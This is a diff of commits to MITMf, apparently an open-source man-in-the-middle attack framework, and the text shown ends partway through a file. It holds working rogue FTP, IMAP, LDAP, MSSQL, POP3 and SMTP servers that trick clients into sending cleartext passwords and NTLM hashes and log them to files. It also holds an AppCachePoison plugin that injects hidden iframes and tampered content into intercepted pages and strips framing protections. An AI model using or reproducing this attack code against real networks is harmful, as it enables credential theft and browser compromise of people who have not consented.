                        #print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)
                        responder_logger.info("[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password))

        except Exception:
            pass

##################################################################################
#ESMTP Stuff ends here
##################################################################################
@@ -1,6 +1,6 @@
 #common functions that are used throughout the Responder's code

-
+import os
 import re

 #Function used to write captured hashs to a file.
@@ -1,25 +1,25 @@
-##################################################################################
-#FTP Stuff starts here
-##################################################################################
+import socket
+import threading
+import logging

+from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
+from core.responder.packet import Packet
+from core.responder.odict import OrderedDict
+from core.responder.common import *
+
+mitmf_logger = logging.getLogger("mitmf")

 class FTPServer():

-    def serve_thread_tcp(host, port, handler):
+    def start(self):
         try:
-            server = ThreadingTCPServer((host, port), handler)
-            server.serve_forever()
-        except Exception, e:
-            print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
-
-    #Function name self-explanatory
-    def start(FTP_On_Off):
-        if FTP_On_Off == "ON":
-            t = threading.Thread(name="FTP", target=self.serve_thread_tcp, args=("0.0.0.0", 21, FTP))
+            mitmf_logger.debug("[FTPServer] online")
+            server = ThreadingTCPServer(("0.0.0.0", 21), FTP)
+            t = threading.Thread(name="FTPServer", target=server.serve_forever)
             t.setDaemon(True)
             t.start()
-
-        if FTP_On_Off == "OFF":
-            return False
+        except Exception, e:
+            mitmf_logger.error("[FTPServer] Error starting on port {}: {}".format(21, e))

 class ThreadingTCPServer(ThreadingMixIn, TCPServer):
@@ -45,8 +45,7 @@ class FTP(BaseRequestHandler):
             data = self.request.recv(1024)
             if data[0:4] == "USER":
                 User = data[5:].replace("\r\n","")
-                #print "[+]FTP User: ", User
-                responder_logger.info('[+]FTP User: %s'%(User))
+                mitmf_logger.info('[FTPServer] {} FTP User: {}'.format(self.client_address[0], User))
                 t = FTPPacket(Code="331",Message="User name okay, need password.")
                 self.request.send(str(t))
                 data = self.request.recv(1024)
@@ -54,8 +53,7 @@ class FTP(BaseRequestHandler):
                 Pass = data[5:].replace("\r\n","")
                 Outfile = "./logs/responder/FTP-Clear-Text-Password-"+self.client_address[0]+".txt"
                 WriteData(Outfile,User+":"+Pass, User+":"+Pass)
-                #print "[+]FTP Password is: ", Pass
-                responder_logger.info('[+]FTP Password is: %s'%(Pass))
+                mitmf_logger.info('[FTPServer] {} FTP Password is: {}'.format(self.client_address[0], Pass))
                 t = FTPPacket(Code="530",Message="User not logged in.")
                 self.request.send(str(t))
                 data = self.request.recv(1024)
@@ -63,9 +61,5 @@ class FTP(BaseRequestHandler):
                 t = FTPPacket(Code="502",Message="Command not implemented.")
                 self.request.send(str(t))
                 data = self.request.recv(1024)
-        except Exception:
-            pass
-
-##################################################################################
-#FTP Stuff ends here
-##################################################################################
+        except Exception as e:
+            mitmf_logger.error("[FTPServer] Error handling request: {}".format(e))
@@ -16,21 +16,8 @@
 # You should have received a copy of the GNU General Public License
 # along with this program. If not, see <http://www.gnu.org/licenses/>.
 import struct
-from odict import OrderedDict
-
-class Packet():
-
-    fields = OrderedDict([
-        ("data", ""),
-    ])
-    def __init__(self, **kw):
-        self.fields = OrderedDict(self.__class__.fields)
-        for k,v in kw.items():
-            if callable(v):
-                self.fields[k] = v(self.fields[k])
-            else:
-                self.fields[k] = v
-    def __str__(self):
-        return "".join(map(str, self.fields.values()))
+from core.responder.odict import OrderedDict
+from core.responder.packet import Packet

 #IMAP4 Greating class
 class IMAPGreating(Packet):
@@ -1,26 +1,23 @@
-##################################################################################
-#IMAP4 Stuff starts here
-##################################################################################
+import logging
+import threading

+from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
+from IMAPPackets import *
+from core.responder.common import *
+
+mitmf_logger = logging.getLogger("mitmf")

 class IMAPServer():

-    def serve_thread_tcp(host, port, handler):
+    def start(self):
         try:
-            server = ThreadingTCPServer((host, port), handler)
-            server.serve_forever()
-        except Exception, e:
-            print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
-
-    #Function name self-explanatory
-    def start(IMAP_On_Off):
-        if IMAP_On_Off == "ON":
-            t = threading.Thread(name="IMAP", target=self.serve_thread_tcp, args=("0.0.0.0", 143,IMAP))
+            mitmf_logger.debug("[IMAPServer] online")
+            server = ThreadingTCPServer(("0.0.0.0", 143), IMAP)
+            t = threading.Thread(name="IMAPServer", target=server.serve_forever)
             t.setDaemon(True)
             t.start()
-
-        if IMAP_On_Off == "OFF":
-            return False
+        except Exception, e:
+            mitmf_logger.error("[IMAPServer] Error starting on port {}: {}".format(143, e))

 class ThreadingTCPServer(ThreadingMixIn, TCPServer):
@@ -46,13 +43,9 @@ class IMAP(BaseRequestHandler):
                 Outfile = "./logs/responder/IMAP-Clear-Text-Password-"+self.client_address[0]+".txt"
                 WriteData(Outfile,Credentials, Credentials)
                 #print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials)
-                responder_logger.info('[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials))
+                mitmf_logger.info('[IMAPServer] IMAP Credentials from {}. ("User" "Pass"): {}'.format(self.client_address[0],Credentials))
                 self.request.send(str(ditchthisconnection()))
                 data = self.request.recv(1024)

-        except Exception:
-            pass
-
-##################################################################################
-#IMAP4 Stuff ends here
-##################################################################################
+        except Exception as e:
+            mitmf_logger.error("[IMAPServer] Error handling request: {}".format(e))
@@ -17,22 +17,8 @@
 # along with this program. If not, see <http://www.gnu.org/licenses/>.

 import struct
-from odict import OrderedDict
-
-class Packet():
-
-    fields = OrderedDict([
-        ("data", ""),
-    ])
-    def __init__(self, **kw):
-        self.fields = OrderedDict(self.__class__.fields)
-        for k,v in kw.items():
-            if callable(v):
-                self.fields[k] = v(self.fields[k])
-            else:
-                self.fields[k] = v
-    def __str__(self):
-        return "".join(map(str, self.fields.values()))
+from core.responder.odict import OrderedDict
+from core.responder.packet import Packet

 class LDAPSearchDefaultPacket(Packet):
     fields = OrderedDict([
@@ -1,25 +1,27 @@
-##################################################################################
-#LDAP Stuff starts here
-##################################################################################
+import struct
+import logging
+import threading
+import re

+from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
+from LDAPPackets import *
+from core.responder.common import *
+
+mitmf_logger = logging.getLogger("mitmf")

 class LDAPServer():

-    def serve_thread_tcp(self, host, port, handler):
-        try:
-            server = ThreadingTCPServer((host, port), handler)
-            server.serve_forever()
-        except Exception, e:
-            print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
-
-    #Function name self-explanatory
-    def start(self, LDAP_On_Off):
-        if LDAP_On_Off == "ON":
-            t = threading.Thread(name="LDAP", target=self.serve_thread_tcp, args=("0.0.0.0", 389,LDAP))
+    def start(self, chal):
+        global Challenge; Challenge = chal
+
+        try:
+            mitmf_logger.debug("[LDAPServer] online")
+            server = ThreadingTCPServer(("0.0.0.0", 389), LDAP)
+            t = threading.Thread(name="LDAPServer", target=server.serve_forever)
             t.setDaemon(True)
             t.start()
-
-        if LDAP_On_Off == "OFF":
-            return False
+        except Exception, e:
+            mitmf_logger.error("[LDAPServer] Error starting on port {}: {}".format(389, e))

 class ThreadingTCPServer(ThreadingMixIn, TCPServer):
@@ -54,15 +56,15 @@ def ParseLDAPHash(data,client):
         UserLen = struct.unpack('<H',data[80:82])[0]
         UserOffset = struct.unpack('<H',data[82:84])[0]
         User = SSPIStarts[UserOffset:UserOffset+UserLen].replace('\x00','')
-        writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
+        writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+Challenge
         Outfile = "./logs/responder/LDAP-NTLMv1-"+client+".txt"
         WriteData(Outfile,writehash,User+"::"+Domain)
         #print "[LDAP] NTLMv1 complete hash is :", writehash
-        responder_logger.info('[LDAP] NTLMv1 complete hash is :%s'%(writehash))
+        mitmf_logger.info('[LDAP] NTLMv1 complete hash is :%s'%(writehash))
     if LMhashLen <2 :
-        Message = '[+]LDAP Anonymous NTLM authentication, ignoring..'
+        Message = '[LDAPServer] LDAP Anonymous NTLM authentication, ignoring..'
         #print Message
-        responder_logger.info(Message)
+        mitmf_logger.info(Message)

 def ParseNTLM(data,client):
     Search1 = re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data)
@@ -91,8 +93,8 @@ def ParseLDAPPacket(data,client):
             Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
             #print '[LDAP]Clear Text User & Password is:', UserDomain+":"+Password
             outfile = "./logs/responder/LDAP-Clear-Text-Password-"+client+".txt"
-            WriteData(outfile,'[LDAP]User: %s Password: %s'%(UserDomain,Password),'[LDAP]User: %s Password: %s'%(UserDomain,Password))
-            responder_logger.info('[LDAP]User: %s Password: %s'%(UserDomain,Password))
+            WriteData(outfile,'[LDAPServer] User: %s Password: %s'%(UserDomain,Password),'[LDAP]User: %s Password: %s'%(UserDomain,Password))
+            mitmf_logger.info('[LDAPServer] User: %s Password: %s'%(UserDomain,Password))
         if sasl == "\xA3":
             buff = ParseNTLM(data,client)
             return buff
@@ -100,7 +102,7 @@ def ParseLDAPPacket(data,client):
         buff = ParseSearch(data)
         return buff
     else:
-        responder_logger.info('[LDAP]Operation not supported')
+        mitmf_logger.info('[LDAPServer] Operation not supported')

 #LDAP Server Class
 class LDAP(BaseRequestHandler):
@@ -115,7 +117,3 @@ class LDAP(BaseRequestHandler):
             self.request.send(buffer0)
         except Exception:
             pass #No need to print timeout errors.
-
-##################################################################################
-#LDAP Stuff ends here
-##################################################################################
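Several of the rewritten servers (LDAP above, MSSQL below) now receive the NTLM challenge as a start() argument instead of reading a module-level global. A hedged sketch of how a caller such as the Responder plugin might wire that up; import paths other than MSSQLServer's are assumptions:

    from configobj import ConfigObj
    from core.responder.mssql.MSSQLServer import MSSQLServer  # path shown later in this commit
    from core.responder.ldap.LDAPServer import LDAPServer     # path assumed by analogy

    challenge = ConfigObj("./config/mitmf.conf")["MITMf"]["SMB"]["Challenge"]

    MSSQLServer().start(challenge)  # servers that build NTLM challenge packets take it explicitly
    LDAPServer().start(challenge)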
@@ -16,21 +16,8 @@
 # You should have received a copy of the GNU General Public License
 # along with this program. If not, see <http://www.gnu.org/licenses/>.
 import struct
-from odict import OrderedDict
-
-class Packet():
-
-    fields = OrderedDict([
-        ("data", ""),
-    ])
-    def __init__(self, **kw):
-        self.fields = OrderedDict(self.__class__.fields)
-        for k,v in kw.items():
-            if callable(v):
-                self.fields[k] = v(self.fields[k])
-            else:
-                self.fields[k] = v
-    def __str__(self):
-        return "".join(map(str, self.fields.values()))
+from core.responder.odict import OrderedDict
+from core.responder.packet import Packet

 #MS-SQL Pre-login packet class
 class MSSQLPreLoginAnswer(Packet):
core/responder/mssql/MSSQLServer.py (new file, 127 lines)
@@ -0,0 +1,127 @@
import struct
import logging
import threading

from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
from MSSQLPackets import *
from core.responder.common import *

mitmf_logger = logging.getLogger("mitmf")

class MSSQLServer():

    def start(self, chal):
        global Challenge; Challenge = chal

        try:
            mitmf_logger.debug("[MSSQLServer] online")
            server = ThreadingTCPServer(("0.0.0.0", 1433), MSSQL)
            t = threading.Thread(name="MSSQLServer", target=server.serve_forever)
            t.setDaemon(True)
            t.start()
        except Exception, e:
            mitmf_logger.error("[MSSQLServer] Error starting on port {}: {}".format(1433, e))

class ThreadingTCPServer(ThreadingMixIn, TCPServer):

    allow_reuse_address = True

    def server_bind(self):
        TCPServer.server_bind(self)

#This function parse SQL NTLMv1/v2 hash and dump it into a specific file.
def ParseSQLHash(data,client):
    SSPIStart = data[8:]
    LMhashLen = struct.unpack('<H',data[20:22])[0]
    LMhashOffset = struct.unpack('<H',data[24:26])[0]
    LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
    NthashLen = struct.unpack('<H',data[30:32])[0]
    if NthashLen == 24:
        NthashOffset = struct.unpack('<H',data[32:34])[0]
        NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
        DomainLen = struct.unpack('<H',data[36:38])[0]
        DomainOffset = struct.unpack('<H',data[40:42])[0]
        Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
        UserLen = struct.unpack('<H',data[44:46])[0]
        UserOffset = struct.unpack('<H',data[48:50])[0]
        User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
        outfile = "./logs/responder/MSSQL-NTLMv1-Client-"+client+".txt"
        WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+Challenge, User+"::"+Domain)
        mitmf_logger.info('[MSSQLServer] MsSQL NTLMv1 hash captured from :{}'.format(client))
        mitmf_logger.info('[MSSQLServer] MSSQL NTLMv1 User is :{}'.format(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
        mitmf_logger.info('[MSSQLServer] MSSQL NTLMv1 Domain is :{}'.format(Domain))
        mitmf_logger.info('[MSSQLServer] MSSQL NTLMv1 Complete hash is: {}'.format(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+Challenge))
    if NthashLen > 60:
        DomainLen = struct.unpack('<H',data[36:38])[0]
        NthashOffset = struct.unpack('<H',data[32:34])[0]
        NthashLen = struct.unpack('<H',data[30:32])[0]
        Hash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
        DomainOffset = struct.unpack('<H',data[40:42])[0]
        Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
        UserLen = struct.unpack('<H',data[44:46])[0]
        UserOffset = struct.unpack('<H',data[48:50])[0]
        User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
        outfile = "./logs/responder/MSSQL-NTLMv2-Client-"+client+".txt"
        Writehash = User+"::"+Domain+":"+Challenge+":"+Hash[:32].upper()+":"+Hash[32:].upper()
        WriteData(outfile,Writehash,User+"::"+Domain)
        mitmf_logger.info('[MSSQLServer] MSSQL NTLMv2 hash captured from {}'.format(client))
        mitmf_logger.info('[MSSQLServer] MSSQL NTLMv2 Domain is: {}'.format(Domain))
        mitmf_logger.info('[MSSQLServer] MSSQL NTLMv2 User is: {}'.format(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
        mitmf_logger.info('[MSSQLServer] MSSQL NTLMv2 Complete Hash is: {}'.format(Writehash))

def ParseSqlClearTxtPwd(Pwd):
    Pwd = map(ord,Pwd.replace('\xa5',''))
    Pw = []
    for x in Pwd:
        Pw.append(hex(x ^ 0xa5)[::-1][:2].replace("x","0").decode('hex'))
    return ''.join(Pw)

def ParseClearTextSQLPass(Data,client):
    outfile = "./logs/responder/MSSQL-PlainText-Password-"+client+".txt"
    UsernameOffset = struct.unpack('<h',Data[48:50])[0]
    PwdOffset = struct.unpack('<h',Data[52:54])[0]
    AppOffset = struct.unpack('<h',Data[56:58])[0]
    PwdLen = AppOffset-PwdOffset
    UsernameLen = PwdOffset-UsernameOffset
    PwdStr = ParseSqlClearTxtPwd(Data[8+PwdOffset:8+PwdOffset+PwdLen])
    UserName = Data[8+UsernameOffset:8+UsernameOffset+UsernameLen].decode('utf-16le')
    WriteData(outfile,UserName+":"+PwdStr,UserName+":"+PwdStr)
    mitmf_logger.info('[MSSQLServer] {} MSSQL Username: {} Password: {}'.format(client, UserName, PwdStr))

def ParsePreLoginEncValue(Data):
    PacketLen = struct.unpack('>H',Data[2:4])[0]
    EncryptionValue = Data[PacketLen-7:PacketLen-6]
    if re.search("NTLMSSP",Data):
        return True
    else:
        return False

#MS-SQL server class.
class MSSQL(BaseRequestHandler):

    def handle(self):
        try:
            while True:
                data = self.request.recv(1024)
                self.request.settimeout(0.1)
                ##Pre-Login Message
                if data[0] == "\x12":
                    buffer0 = str(MSSQLPreLoginAnswer())
                    self.request.send(buffer0)
                    data = self.request.recv(1024)
                ##NegoSSP
                if data[0] == "\x10":
                    if re.search("NTLMSSP",data):
                        t = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge)
                        t.calculate()
                        buffer1 = str(t)
                        self.request.send(buffer1)
                        data = self.request.recv(1024)
                    else:
                        ParseClearTextSQLPass(data,self.client_address[0])
                ##NegoSSP Auth
                if data[0] == "\x11":
                    ParseSQLHash(data,self.client_address[0])
        except Exception:
            pass
        self.request.close()
63
core/responder/pop3/POP3Server.py
Normal file
63
core/responder/pop3/POP3Server.py
Normal file
|
@@ -0,0 +1,63 @@
import logging
import threading

from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
from core.responder.common import *
from core.responder.odict import OrderedDict
from core.responder.packet import Packet

mitmf_logger = logging.getLogger("mitmf")

class POP3Server():

    def start(self):
        try:
            mitmf_logger.debug("[POP3Server] online")
            server = ThreadingTCPServer(("0.0.0.0", 110), POP)
            t = threading.Thread(name="POP3Server", target=server.serve_forever)
            t.setDaemon(True)
            t.start()
        except Exception, e:
            mitmf_logger.error("[POP3Server] Error starting on port {}: {}".format(110, e))

class ThreadingTCPServer(ThreadingMixIn, TCPServer):

    allow_reuse_address = 1

    def server_bind(self):
        TCPServer.server_bind(self)

class POPOKPacket(Packet):
    fields = OrderedDict([
        ("Code", "+OK"),
        ("CRLF", "\r\n"),
    ])

#POP3 server class.
class POP(BaseRequestHandler):

    def handle(self):
        try:
            self.request.send(str(POPOKPacket()))
            data = self.request.recv(1024)
            if data[0:4] == "USER":
                User = data[5:].replace("\r\n","")
                mitmf_logger.info('[+]POP3 User: %s'%(User))
                t = POPOKPacket()
                self.request.send(str(t))
                data = self.request.recv(1024)
            if data[0:4] == "PASS":
                Pass = data[5:].replace("\r\n","")
                Outfile = "./logs/responder/POP3-Clear-Text-Password-"+self.client_address[0]+".txt"
                WriteData(Outfile,User+":"+Pass, User+":"+Pass)
                mitmf_logger.info("[POP3Server] POP3 Credentials from {}. User/Pass: {}:{} ".format(self.client_address[0],User,Pass))
                t = POPOKPacket()
                self.request.send(str(t))
                data = self.request.recv(1024)
            else:
                t = POPOKPacket()
                self.request.send(str(t))
                data = self.request.recv(1024)
        except Exception as e:
            mitmf_logger.error("[POP3Server] Error handling request: {}".format(e))
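A quick way to exercise the POP3 handler locally is the standard library's poplib; this is only a test sketch and assumes the rogue server is reachable on 127.0.0.1:110 (the handler never answers QUIT, so the socket is closed directly):

import poplib

p = poplib.POP3('127.0.0.1', 110)   # handler greets with "+OK"
p.user('alice')                     # handler logs the USER value and replies "+OK"
p.pass_('S3cret!')                  # handler writes alice:S3cret! to the logfile and replies "+OK"
p.sock.close()                      # skip quit(): the handler closes without answering QUIT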
@@ -16,21 +16,8 @@
 # You should have received a copy of the GNU General Public License
 # along with this program. If not, see <http://www.gnu.org/licenses/>.
 import struct
-from odict import OrderedDict
-
-class Packet():
-    fields = OrderedDict([
-        ("data", ""),
-    ])
-    def __init__(self, **kw):
-        self.fields = OrderedDict(self.__class__.fields)
-        for k,v in kw.items():
-            if callable(v):
-                self.fields[k] = v(self.fields[k])
-            else:
-                self.fields[k] = v
-    def __str__(self):
-        return "".join(map(str, self.fields.values()))
+from core.responder.odict import OrderedDict
+from core.responder.packet import Packet

 #SMTP Greating class
 class SMTPGreating(Packet):
62  core/responder/smtp/SMTPServer.py  Normal file
@@ -0,0 +1,62 @@
import logging
import threading

from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
from base64 import b64decode
from SMTPPackets import *
from core.responder.common import *

mitmf_logger = logging.getLogger("mitmf")

class SMTPServer():

    def serve_thread_tcp(self, port):
        try:
            server = ThreadingTCPServer(("0.0.0.0", port), ESMTP)
            server.serve_forever()
        except Exception as e:
            mitmf_logger.error("[SMTPServer] Error starting TCP server on port {}: {}".format(port, e))

    #Function name self-explanatory
    def start(self):
        mitmf_logger.debug("[SMTPServer] online")
        t1 = threading.Thread(name="ESMTP-25", target=self.serve_thread_tcp, args=(25,))
        t2 = threading.Thread(name="ESMTP-587", target=self.serve_thread_tcp, args=(587,))

        for t in [t1, t2]:
            t.setDaemon(True)
            t.start()

class ThreadingTCPServer(ThreadingMixIn, TCPServer):

    allow_reuse_address = 1

    def server_bind(self):
        TCPServer.server_bind(self)

#ESMTP server class.
class ESMTP(BaseRequestHandler):

    def handle(self):
        try:
            self.request.send(str(SMTPGreating()))
            data = self.request.recv(1024)
            if data[0:4] == "EHLO":
                self.request.send(str(SMTPAUTH()))
                data = self.request.recv(1024)
            if data[0:4] == "AUTH":
                self.request.send(str(SMTPAUTH1()))
                data = self.request.recv(1024)
                if data:
                    Username = b64decode(data[:len(data)-2])
                    self.request.send(str(SMTPAUTH2()))
                    data = self.request.recv(1024)
                    if data:
                        Password = b64decode(data[:len(data)-2])
                        Outfile = "./logs/responder/SMTP-Clear-Text-Password-"+self.client_address[0]+".txt"
                        WriteData(Outfile,Username+":"+Password, Username+":"+Password)
                        #print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)
                        mitmf_logger.info("[SMTPServer] {} SMTP User: {} Pass:{} ".format(self.client_address[0],Username,Password))

        except Exception as e:
            mitmf_logger.error("[SMTPServer] Error handling request: {}".format(e))
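The ESMTP handler fakes just enough of an AUTH LOGIN exchange to collect a base64-encoded username and password. A raw-socket sketch of the dialogue it expects, with placeholder host and credentials:

import socket
from base64 import b64encode

s = socket.create_connection(('127.0.0.1', 25))
s.recv(1024)                              # banner from SMTPGreating()
s.sendall("EHLO test\r\n")
s.recv(1024)                              # SMTPAUTH() reply advertising AUTH
s.sendall("AUTH LOGIN\r\n")
s.recv(1024)                              # SMTPAUTH1() reply prompting for the username
s.sendall(b64encode("alice") + "\r\n")    # handler b64-decodes this into Username
s.recv(1024)                              # SMTPAUTH2() reply prompting for the password
s.sendall(b64encode("S3cret!") + "\r\n")  # handler b64-decodes this into Password and logs the pair
s.close()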
@@ -103,7 +103,7 @@ class ProxyPlugins:
        except KeyError as e:
            pass
        except Exception as e:
-            #This is needed because errors in hooked functions won't raise an Exception + Tracback (which can be infuriating)
+            #This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
            mitmf_logger.error("[ProxyPlugins] Exception occurred in hooked function")
            traceback.print_exc()

@@ -98,7 +98,7 @@ class ServerConnection(HTTPClient):
            postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
            if len(postdata) > 0:
                mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], postdata))
-        except UnicodeDecodeError:
+        except UnicodeDecodeError and UnicodeEncodeError:
            mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host']))
            pass

@@ -1 +1 @@
-Subproject commit 4609adeb5383135352aa27113d8ee1398aecff99
+Subproject commit 0bd3429e6775395c3522046ab21193a36ab2e0fe
9  mitmf.py
@@ -39,8 +39,6 @@ if os.geteuid() != 0:
 mitmf_version = "0.9.7"
 sslstrip_version = "0.9"
 sergio_version = "0.2.1"
-dnschef_version = "0.4"
-netcreds_version = "1.0"

 parser = argparse.ArgumentParser(description="MITMf v{} - Framework for MITM attacks".format(mitmf_version), version=mitmf_version, usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')

@@ -162,17 +160,16 @@ print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version)
 #Start Net-Creds
 from core.netcreds.NetCreds import NetCreds
 NetCreds().start(args.interface, myip)
-print "|_ Net-Creds v{} online".format(netcreds_version)
+print "|_ Net-Creds v{} online".format(NetCreds.version)

 #Start DNSChef
 from core.dnschef.DNSchef import DNSChef
 DNSChef.getInstance().start()
-print "|_ DNSChef v{} online".format(dnschef_version)
+print "|_ DNSChef v{} online".format(DNSChef.version)

 #start the SMB server
 from core.protocols.smb.SMBserver import SMBserver
-from impacket import version
-print "|_ SMBserver online (Impacket {})\n".format(version.VER_MINOR)
+print "|_ SMBserver online (Impacket {})\n".format(SMBserver.impacket_ver)
 SMBserver().start()

 #start the reactor
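The banner changes above replace the module-level version constants deleted in the first hunk with attributes read off the component classes themselves. A minimal sketch of the pattern (the class bodies are placeholders; only the attribute access mirrors the diff):

class NetCreds(object):
    version = "1.0"    # previously the netcreds_version constant in mitmf.py

class DNSChef(object):
    version = "0.4"    # previously the dnschef_version constant in mitmf.py

print "|_ Net-Creds v{} online".format(NetCreds.version)
print "|_ DNSChef v{} online".format(DNSChef.version)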
206  plugins/AppCachePoison.py  Normal file
@@ -0,0 +1,206 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz

import logging
import re
import os.path
import time
import sys

from datetime import date
from plugins.plugin import Plugin
from core.sslstrip.URLMonitor import URLMonitor

mitmf_logger = logging.getLogger("mitmf")

class AppCachePlugin(Plugin):
    name = "App Cache Poison"
    optname = "appoison"
    desc = "Performs App Cache Poisoning attacks"
    implements = ["handleResponse"]
    version = "0.3"
    has_opts = False

    def initialize(self, options):
        self.options = options
        self.mass_poisoned_browsers = []
        self.urlMonitor = URLMonitor.getInstance()

        self.urlMonitor.setAppCachePoisoning()

    def handleResponse(self, request, data):

        self.app_config = self.config['AppCachePoison']  # so we reload the config on each request
        url = request.client.uri
        req_headers = request.client.getAllHeaders()
        headers = request.client.responseHeaders
        ip = request.client.getClientIP()

        #########################################################################

        if "enable_only_in_useragents" in self.app_config:
            regexp = self.app_config["enable_only_in_useragents"]
            if regexp and not re.search(regexp,req_headers["user-agent"]):
                mitmf_logger.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"]))
                return {'request': request, 'data': data}

        urls = self.urlMonitor.getRedirectionSet(url)
        mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls))
        (name,s,element,url) = self.getSectionForUrls(urls)

        if s is False:
            data = self.tryMassPoison(url, data, headers, req_headers, ip)
            return {'request': request, 'data': data}

        mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name))
        p = self.getTemplatePrefix(s)

        if element == 'tamper':
            mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p))
            if os.path.exists(p + '.replace'):  # replace whole content
                f = open(p + '.replace','r')
                data = self.decorate(f.read(), s)
                f.close()

            elif os.path.exists(p + '.append'):  # append file to body
                f = open(p + '.append','r')
                appendix = self.decorate(f.read(), s)
                f.close()
                # append to body
                data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)

            # add manifest reference
            data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)

        elif element == "manifest":
            mitmf_logger.info("%s Poisoning manifest URL" % ip)
            data = self.getSpoofedManifest(url, s)
            headers.setRawHeaders("Content-Type", ["text/cache-manifest"])

        elif element == "raw":  # raw resource to modify, it does not have to be html
            mitmf_logger.info("%s Poisoning raw URL" % ip)
            if os.path.exists(p + '.replace'):  # replace whole content
                f = open(p + '.replace','r')
                data = self.decorate(f.read(), s)
                f.close()

            elif os.path.exists(p + '.append'):  # append file to body
                f = open(p + '.append','r')
                appendix = self.decorate(f.read(), s)
                f.close()
                # append to response body
                data += appendix

        self.cacheForFuture(headers)
        self.removeDangerousHeaders(headers)
        return {'request': request, 'data': data}

    def tryMassPoison(self, url, data, headers, req_headers, ip):
        browser_id = ip + req_headers.get("user-agent", "")

        if not 'mass_poison_url_match' in self.app_config:  # no url
            return data
        if browser_id in self.mass_poisoned_browsers:  #already poisoned
            return data
        if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]):  #not HTML
            return data
        if 'mass_poison_useragent_match' in self.app_config and not "user-agent" in req_headers:
            return data
        if not re.search(self.app_config['mass_poison_useragent_match'], req_headers['user-agent']):  #different UA
            return data
        if not re.search(self.app_config['mass_poison_url_match'], url):  #different url
            return data

        mitmf_logger.debug("Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
        appendix = self.getMassPoisonHtml()
        data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
        self.mass_poisoned_browsers.append(browser_id)  # mark to avoid mass spoofing for this ip
        return data

    def getMassPoisonHtml(self):
        html = "<div style=\"position:absolute;left:-100px\">"
        for i in self.app_config:
            if isinstance(self.app_config[i], dict):
                if self.app_config[i].has_key('tamper_url') and not self.app_config[i].get('skip_in_mass_poison', False):
                    html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.app_config[i]['tamper_url'] + "\"></iframe>"

        return html + "</div>"

    def cacheForFuture(self, headers):
        ten_years = 315569260
        headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)])
        headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"])  # it was modifed long ago, so is most likely fresh
        in_ten_years = date.fromtimestamp(time.time() + ten_years)
        headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])

    def removeDangerousHeaders(self, headers):
        headers.removeHeader("X-Frame-Options")

    def getSpoofedManifest(self, url, section):
        p = self.getTemplatePrefix(section)
        if not os.path.exists(p+'.manifest'):
            p = self.getDefaultTemplatePrefix()

        f = open(p + '.manifest', 'r')
        manifest = f.read()
